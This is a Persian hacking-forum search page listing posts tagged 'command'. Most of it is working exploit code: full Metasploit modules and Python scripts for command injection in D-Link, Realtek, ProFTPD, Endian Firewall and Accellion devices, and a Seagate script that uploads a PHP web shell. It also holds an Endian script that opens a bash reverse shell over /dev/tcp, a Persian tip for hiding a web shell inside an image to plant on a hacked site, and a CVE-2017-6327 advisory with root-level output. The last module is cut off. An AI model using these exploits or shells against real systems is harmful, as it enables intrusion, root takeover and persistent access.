امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'command'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

74 نتیجه پیدا شد

  1. Black_petya

    Windows

    میخواهید سایتی را هک کنید و شل خود را روی ان سایت فراخوانی کنید یکی از راحت ترین روش های چسبناندن شل به عکس هست کافیه در cmd از دستور زیر استفاده کنید copy /b shell.php + photo.jpg sobhaneh.rar با دستور بالا میتوانید شل را به عکس بچسبانید نکته ( باید هر دوتا فایل را به یک فولدر ریخته و با دستور cd به دایرکتوری رفته و بعد اقدام به این کار بکنید) با اپلود شدن عکس در وب یک بار ادرس عکس را باز کنید بعد شل اتوماتیک روی سایت جایش را میگیرد. امید وارم خوشتان بیایید میتوانید با این روش ویروس را هم به عکس بچسپانید
  2. This is an advisory for CVE-2017-6327 which is an unauthenticated remote code execution flaw in the web interface of Symantec Messaging Gateway prior to and including version 10.6.3-2, which can be used to execute commands as root. Symantec Messaging Gateway, formerly known as Brightmail, is a linux-based anti-spam/security product for e-mail servers. It is deployed as a physical device or with ESX in close proximity to the servers it is designed to protect. =*=*=*=*=*=*=*=*= TIMELINE 2017-07-07: Reported to Symantec 2017-08-10: Patch and notice released by Symantec [1] 2017-08-18: Public technical advisory =*=*=*=*=*=*=*=*= DESCRIPTION - Bug #1: Web authentication bypass The web management interface is available via HTTPS, and you can't do much without logging in. If the current session (identified by the `JSESSIONID` cookie) has the `user` attribute set, the session is considered authenticated. The file LoginAction.class defines a number of public methods and they can all be reached via unauthenticated web requests. By making a GET request to `/brightmail/action1.do?method=method_name` we can execute `LoginAction.method_name` if `method_name` is a public method. One such public method which will be the target of our authentication bypass is called `LoginAction.notificationLogin`. It does the following: 1. Decrypt the `notify` parameter using `BrightmailDecrypt.decrypt` 2. Creates a new `UserTO` object using the decrypted `notify` parameter as an email value 3. Creates a new session, invalidating the old one if necessary 4. Sets the `user` attribute of the newly created session to our constructed UserTO object It essentially takes a username value from a GET parameter and logs you in as this user if it exists. If not, it creates this user for you. We need to encrypt our `notify` argument so that `BrightmailDecrypt.decrypt` will decrypt it properly. Fortunately the encryption is just PBEWithMD5AndDES using a static password, conveniently included in the code itself. I won't include the encryption password or a fully encrypted notify string in this post. Example request: GET /brightmail/action1.do?method=notificationLogin&notify=MTIzNDU2Nzg%3d6[...]&id=test HTTP/1.1 ... HTTP/1.1 302 Found Server: Apache-Coyote/1.1 ... Set-Cookie: JSESSIONID=9E45E9F70FAC0AADAC9EB7A03532F65D; Path=/brightmail; Secure; HttpOnly - Bug #2: Command injection The RestoreAction.performRestore method can be reached with an authenticated session and it takes the restoreSource and localBackupFilename parameters. After a long chain of function calls, localBackupFilename ends up being sent to the local "bmagent" daemon listening on port 41002. It will execute /opt/Symantec/Brightmail/cli/bin/db-restore with argv[1] being our supplied value. The db-restore script is a sudo wrapper for /opt/Symantec/Brightmail/cli/sbin/db-restore, which in turn is a perl script containing a command injection in a call to /usr/bin/du. $ /opt/Symantec/Brightmail/cli/bin/db-restore 'asdf;"`id`";' /usr/bin/du: cannot access `/data/backups/asdf': No such file or directory sh: uid=0(root) gid=0(root) groups=0(root): command not found ERROR: Failed to copy 'asdf;"`id`";' from local backup store: No such file or directory This command injection can be exploited from the web management interface with a valid session, which we can create using bug #1. - Combining bug #1 and #2 The last step is to get a CSRF token since the vulnerable performRestore function is annotated with @CSRF. After some quick digging it turns out that all you need to do is call /brightmail/common.jsp to get a token that will be valid for all your requests. The URL-encoded value we provide for the `localBackupFileSelection` parameter is: asdf`id>/data/bcc/webapps/brightmail/output.txt;/bin/uname -a>>/data/bcc/webapps/brightmail/output.txt`hehehe Request: GET /brightmail/admin/restore/action5.do?method=performRestore&symantec.brightmail.key.TOKEN=bbda9b0a52bca4a43cc2b6051cd6b95900068cd3&restoreSource=APPLIANCE&localBackupFileSelection=%61%73%64%66%60%69%64%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%3b%2f%62%69%6e%2f%75%6e%61%6d%65%20%2d%61%3e%3e%2f%64%61%74%61%2f%62%63%63%2f%77%65%62%61%70%70%73%2f%62%72%69%67%68%74%6d%61%69%6c%2f%6f%75%74%70%75%74%2e%74%78%74%60%68%65%68%65%68%65 HTTP/1.1 Host: 192.168.205.220 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cookie: JSESSIONID=34D61B34698831DB765A9DD5E0049D0B Connection: close Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store,no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Frame-Options: SAMEORIGIN Content-Type: text/html;charset=UTF-8 Content-Length: 803 Date: Thu, 29 Jun 2017 06:48:12 GMT Connection: close <HTML> <title>Symantec Messaging Gateway -&nbsp;Restore</title> ... Now to confirm that our command output was correctly placed in a file inside the webroot. imac:~% curl -k https://192.168.205.220/brightmail/output.txt uid=0(root) gid=0(root) groups=0(root) Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux =*=*=*=*=*=*=*=*= EXPLOIT OUTPUT imac:~/brightmail% python brightmail-rce.py https://192.168.205.220/brightmail bypassing login.. * JSESSIONID=693079639299816F80016123BE8A0167 verifying login bypass.. * Version: 10.6.3 getting csrf token.. * 1e35af8c567d3448a65c8516a835cec30b6b8b73 done, verifying.. uid=501(bcc) gid=99(nobody) euid=0(root) egid=0(root) groups=0(root),99(nobody),499(mysql),502(bcc) Linux localhost.localdomain 2.6.32-573.3.1.el6.x86_64 #1 SMP Thu Aug 13 22:55:16 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux # cat /etc/issue Symantec Messaging Gateway Version 10.6.3-2 Copyright (c) 1998-2017 Symantec Corporation. All rights reserved. =*=*=*=*=*=*=*=*= REFERENCES [1] https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00 =*=*=*=*=*=*=*=*= CREDIT Philip Pettersson
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Devices HNAP SOAPAction-Header Command Execution', 'Description' => %q{ Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested on a DIR-645 device. The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR }, 'Author' => [ 'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645 'Craig Heffner', # independent Vulnerability discovery on different other routers 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'], ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'] ], 'DisclosureDate' => 'Feb 13 2015', 'Privileged' => true, 'Platform' => 'linux', 'Targets' => [ [ 'MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target { 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') end def check uri = '/HNAP1/' soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings' begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }) if res && [200].include?(res.code) && res.body =~ /D-Link/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 200, :temp => '' ) end def execute_command(cmd, opts) uri = '/HNAP1/' # we can not use / in our command so we need to use a little trick cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`" begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'headers' => { 'SOAPAction' => soap_action, } }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end
  4. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include REXML def initialize(info = {}) super(update_info(info, 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', 'Description' => %q{ Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, there is no output for the executed command. This module has been tested successfully on a Trendnet TEW-731BR router with emulation. }, 'Author' => [ 'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8361'], ['ZDI', '15-155'], ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] ], 'DisclosureDate' => 'Apr 24 2015', 'Privileged' => true, 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'MIPS Little Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 0 )) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR') register_options( [ Opt::RPORT(52869) # port of UPnP SOAP webinterface ], self.class) end def check begin res = send_request_cgi({ 'uri' => '/picsdesc.xml' }) if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") execute_cmdstager( :flavour => :echo, :linemax => 50, :nodelete => true ) end def execute_command(cmd, opts) uri = '/wanipcn.xml' soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' data_cmd = '<?xml version="1.0"?>' + build_soap_req begin res = send_request_cgi({ 'uri' => uri, 'vars_get' => { 'service' => 'WANIPConn1' }, 'ctype' => 'text/xml', 'method' => 'POST', 'headers' => { 'SOAPAction' => soap_action }, 'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`") }) return res rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def build_soap_req new_external_port = rand(32767) + 32768 new_internal_port = rand(32767) + 32768 xml = Document.new xml.add_element( 'SOAP-ENV:Envelope', { 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' }) xml.root.add_element('SOAP-ENV:Body') body = xml.root.elements[1] body.add_element( 'm:AddPortMapping', { 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' }) port_mapping = body.elements[1] port_mapping.add_element('NewLeaseDuration') port_mapping.add_element('NewInternalClient') port_mapping.add_element('NewEnabled') port_mapping.add_element('NewExternalPort') port_mapping.add_element('NewRemoteHost') port_mapping.add_element('NewProtocol') port_mapping.add_element('NewInternalPort') port_mapping.elements['NewLeaseDuration'].text = '' port_mapping.elements['NewInternalClient'].text = 'CMD_HERE' port_mapping.elements['NewEnabled'].text = '1' port_mapping.elements['NewExternalPort'].text = "#{new_external_port}" port_mapping.elements['NewRemoteHost'].text = '' port_mapping.elements['NewProtocol'].text = 'TCP' port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}" xml.to_s end end
  5. mohammad_ghazei

    Hacking

    #!/usr/bin/python # seagate_ftp_remote_root.py # # Seagate Central Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central by default has a passwordless root account (and no option to change it). # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot. # From there, we can execute commands with root privileges as lighttpd is also running as root. # # -Fixes- # # Seagate scheduled it's updates to go live on April 28th, 2015. # # Tested Firmware Version: 2014.0410.0026-F # import sys from ftplib import FTP port = 21 php_shell = """ <?php if(isset($_REQUEST['cmd'])) { $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd); } ?> """ php_shell_filename = "shell.php" seagate_central_webroot = "/cirrus/" def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) return if __name__ == "__main__": main()
  6. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', 'Description' => %q{ This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible. }, 'Author' => [ 'Vadim Melihow', # Original discovery, Proof of Concept 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk bash python perl' } }, 'Targets' => [ [ 'ProFTPD 1.3.5', { } ] ], 'DisclosureDate' => 'Apr 22 2015', 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('TARGETURI', [true, 'Base path to the website', '/']), OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1, 10) if res && res.include?('350') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" } ) unless res && res.code == 200 fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end end
  7. mohammad_ghazei

    Hacking

    #!/usr/bin/env python # Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) # OS Command Injection Exploit POC (Reverse TCP Shell) # Ben Lincoln, 2015-06-28 # http://www.beneaththewaves.net/ # Requires knowledge of a valid proxy username and password on the target Endian Firewall import httplib import sys proxyUserPasswordChangeURI = "/cgi-bin/chpasswd.cgi" def main(): if len(sys.argv) < 7: print "Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) Exploit\r\n" print "Usage: " + sys.argv[0] + " [TARGET_SYSTEM_IP] [TARGET_SYSTEM_WEB_PORT] [PROXY_USER_NAME] [PROXY_USER_PASSWORD] [REVERSE_SHELL_IP] [REVERSE_SHELL_PORT]\r\n" print "Example: " + sys.argv[0] + " 172.16.97.1 10443 proxyuser password123 172.16.97.17 443\r\n" print "Be sure you've started a TCP listener on the specified IP and port to receive the reverse shell when it connects.\r\n" print "E.g. ncat -nvlp 443" sys.exit(1) multipartDelimiter = "---------------------------334002631541493081770656718" targetIP = sys.argv[1] targetPort = sys.argv[2] userName = sys.argv[3] password = sys.argv[4] reverseShellIP = sys.argv[5] reverseShellPort = sys.argv[6] exploitString = password + "; /bin/bash -c /bin/bash -i >& /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;" endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI conn = httplib.HTTPSConnection(targetIP, targetPort) headers = {} headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0" headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" headers["Accept-Encoding"] = "" headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter headers["Accept-Language"] = "en-US,en;q=0.5" headers["Connection"] = "keep-alive" multipartDelimiter = "--" + multipartDelimiter body = multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n" body = body + "change\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n" body = body + userName + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n" body = body + password + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n" body = body + exploitString + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n" body = body + exploitString + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n" body = body + " Change password\r\n" body = body + multipartDelimiter + "--" + "\r\n" conn.request("POST", proxyUserPasswordChangeURI, body, headers) response = conn.getresponse() print "HTTP " + str(response.status) + " " + response.reason + "\r\n" print response.read() print "\r\n\r\n" if __name__ == "__main__": main()
  8. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Endian Firewall < 3.0.0 Proxy Password Change Command Injection', 'Description' => %q{ This module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but on versions of EFW I tested, this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd as root. This script changes the password for the Linux root account on the system to the value specified by console input once it is executed. The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth credentials as well to exploit this vulnerability. Use the standard USERNAME and PASSWORD advanced options to specify these values if required. Versions >= 3.0.0 still contain the vulnerable code, but it appears to never be executed due to a bug in the vulnerable CGI script which also prevents normal use. Tested successfully against the following versions of EFW Community: 1.1 RC5, 2.0, 2.1, 2.5.1, 2.5.2. Used Apache mod_cgi Bash Environment Variable Code Injection and Novell ZENworks Configuration Management Remote Execution modules as templates. }, 'Author' => [ 'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module ], 'References' => [ # ['CVE', ''], # ['OSVDB', ''], # ['EDB', ''], ['URL', 'http://jira.endian.com/browse/COMMUNITY-136'] ], 'Privileged' => false, 'Platform' => %w{ linux }, 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 2048 }, 'Targets' => [ [ 'Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => [ :echo, :printf ] } ], [ 'Linux x86_64', { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => [ :echo, :printf ] } ] ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 10443 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015', 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', '/cgi-bin/chpasswd.cgi']), OptString.new('EFW_USERNAME', [true, 'Valid proxy account username for the target system']), OptString.new('EFW_PASSWORD', [true, 'Valid password for the proxy user account']), OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']), OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10]) ], self.class) end def exploit # Cannot use generic/shell_reverse_tcp inside an elf # Checking before proceeds if generate_payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, " + "please select a native payload") end execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true) end def execute_command(cmd, opts) cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") req(cmd) end def req(cmd) sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};" boundary = "----#{rand_text_alpha(34)}" data = "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n" data << "change\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n" data << "#{datastore['EFW_USERNAME']}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n" data << "#{datastore['EFW_PASSWORD']}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n" data << "#{sploit}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n" data << "#{sploit}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n" data << " Change password\r\n" data << "--#{boundary}--\r\n" refererUrl = "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + "#{datastore['TARGETURI']}" send_request_cgi( { 'method' => 'POST', 'uri' => datastore['TARGETURI'], 'ctype' => "multipart/form-data; boundary=#{boundary}", 'headers' => { 'Referer' => refererUrl }, 'data' => data }, datastore['TIMEOUT']) end end
  9. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Accellion FTA getStatus verify_oauth_token Command Execution', 'Description' => %q{ This module exploits a metacharacter shell injection vulnerability in the Accellion File Transfer appliance. This vulnerability is triggered when a user-provided 'oauth_token' is passed into a system() call within a mod_perl handler. This module exploits the '/tws/getStatus' endpoint. Other vulnerable handlers include '/seos/find.api', '/seos/put.api', and /seos/mput.api'. This issue was confirmed on version FTA_9_11_200, but may apply to previous versions as well. This issue was fixed in software update FTA_9_11_210. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://r-7.co/R7-2015-08'], ['CVE', '2015-2857'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl bash telnet', } }, 'Targets' => [ [ 'Automatic', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 10 2015' )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]) ], self.class) end def check uri = '/tws/getStatus' res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token' => 'invalid' }}) unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"MD5 token is invalid"/ return Exploit::CheckCode::Safe end res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token' => "';echo '" }}) unless res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/ return Exploit::CheckCode::Safe end Msf::Exploit::CheckCode::Vulnerable end def exploit # The token 